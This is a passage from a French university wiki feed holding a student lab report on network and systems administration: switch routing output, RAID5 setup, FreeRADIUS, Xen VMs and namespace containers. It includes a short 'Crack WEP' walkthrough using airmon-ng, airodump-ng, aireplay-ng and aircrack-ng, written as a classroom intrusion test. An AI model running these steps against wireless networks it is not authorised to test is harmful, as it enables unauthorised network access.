  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=&amp;lt;NOTRE_MDP_ROOT&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur '''Cordouan''' =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== Le routage de sites (IPv4) ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49073</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49073"/>
				<updated>2018-12-21T11:15:20Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Les réseaux virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
